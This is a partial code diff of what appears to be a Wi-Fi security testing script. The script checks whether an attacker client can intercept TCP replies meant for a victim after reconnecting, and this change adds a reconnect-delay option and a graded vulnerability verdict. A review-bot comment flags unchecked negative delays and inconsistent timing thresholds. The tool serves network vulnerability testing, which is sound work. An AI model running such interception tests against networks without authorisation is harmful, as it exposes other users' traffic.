| skipped 437 lines |
438 | 438 | | if self.options.same_id: |
439 | 439 | | log(STATUS, f">>> Received TCP SYN/ACK after connecting and reconnecting as {self.id_victim}.", color="green") |
440 | 440 | | else: |
441 | | - | log(STATUS, f">>> Attacker {self.id_attacker} intercepted TCP SYN/ACK reply to victim {self.id_victim}.", color="red") |
442 | | - | log(STATUS, f">>> This means the network is vulnerable!", color="red") |
| 441 | + | delay = time.time() - self.time_start_reconnect |
| 442 | + | log(STATUS, f">>> Attacker {self.id_attacker} intercepted TCP SYN/ACK reply" \ |
| 443 | + | f" to victim {self.id_victim} after {delay:.1f}s.", color="red") |
| 444 | + | if delay < 10: |
| 445 | + | log(STATUS, f">>> This means the network is vulnerable!", color="red") |
| 446 | + | else: |
| 447 | + | log(STATUS, f">>> This means the network is vulnerable, but the {delay:.1f}s " \ |
| 448 | + | "delay until interception makes attacks harder.", color="orange") |
443 | 449 | | quit(1) |
444 | 450 | | |
445 | 451 | | |
| skipped 129 lines |
575 | 581 | | # Step 2. Reconnect |
576 | 582 | | # |
577 | 583 | | |
578 | | - | time_start_reconnect = time.time() |
| 584 | + | self.time_start_reconnect = time.time() |
579 | 585 | | |
580 | 586 | | if self.options.other_bss: |
581 | 587 | | # If --other-bss was used, then blacklist the victim BSSID we just used. |
| skipped 7 lines |
589 | 595 | | # When not using --other-bss, force reconnecting to the same AP |
590 | 596 | | self.set_bssid(self.bssid_victim) |
591 | 597 | | |
| 598 | + | if self.options.delay != 0: |
| 599 | + | self.disconnect(wait=True) |
| 600 | + | log(STATUS, f"Sleeping for {self.options.delay}s before reconnecting") |
| 601 | + | time.sleep(self.options.delay) |
| 602 | + | |
592 | 603 | | if self.options.same_id: |
593 | 604 | | log(STATUS, f"Reconnecting as the victim...", color="green") |
594 | 605 | | self.connect(self.netid_victim, timeout=20) |
| skipped 5 lines |
600 | 611 | | log(STATUS, f"Listening for replies to the victim's TCP SYN request...", color="green") |
601 | 612 | | self.get_ip_address() |
602 | 613 | | |
603 | | - | time_reconnect = time.time() - time_start_reconnect |
604 | | - | if time_reconnect > 9: |
| 614 | + | time_reconnect = time.time() - self.time_start_reconnect |
| 615 | + | if time_reconnect > self.options.delay + 9: |
605 | 616 | | log(WARNING, f"Took {time_reconnect:.1f}s to reconnect & confirm IP." + \ |
606 | 617 | | " This is slow, may cause test to fail. Options are:") |
607 | 618 | | log(WARNING, f"- Assure server still sends SYN/ACKs after this time. If so, this script will still work.") |
| skipped 139 lines |
747 | 758 | | parser.add_argument("--config", default="client.conf", help="Config containing victim and attacker credentials.") |
748 | 759 | | parser.add_argument("--server", default="8.8.8.8", help="Server to send TCP SYN to.") |
749 | 760 | | parser.add_argument("--ping", default=False, action="store_true", help="Perform ping to test connection.") |
| 761 | + | parser.add_argument("--delay", default=0, type=float, help="Time to wait before reconnecting as attacker.") |
750 | 762 | | parser.add_argument("-d", "--debug", action="count", default=0, help="Increase output verbosity.") |
751 | 763 | | parser.add_argument("--other-bss", default=False, action="store_true", help="User different BSS=AP for victim/attacker.") |
752 | 764 | | parser.add_argument("--no-ssid-check", default=False, action="store_true", help="Allow victim and attacker to use different SSIDs.") |
| skipped 44 lines |
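Review bot: The new `--delay` option is never range-checked, and the reconnect step guards it with `if self.options.delay != 0:`, so a negative value still disconnects the client and then makes `time.sleep` raise `ValueError`; use `if self.options.delay > 0:` there and reject negative values when the arguments are parsed. In the SYN/ACK branch the elapsed time is measured from `self.time_start_reconnect`, which now includes the deliberate sleep, yet it is compared with a fixed `delay < 10`, while the slow-reconnect warning compares against `self.options.delay + 9`. If the softer "makes attacks harder" verdict is meant to reflect only network-side latency, a run with `--delay 10` or more will always print it and understate the finding, and `if delay < self.options.delay + 10:` would keep the two checks consistent. The enclosing methods start and end outside the visible lines, so whether `self.time_start_reconnect` is initialised before the reply handler can run could not be checked from here.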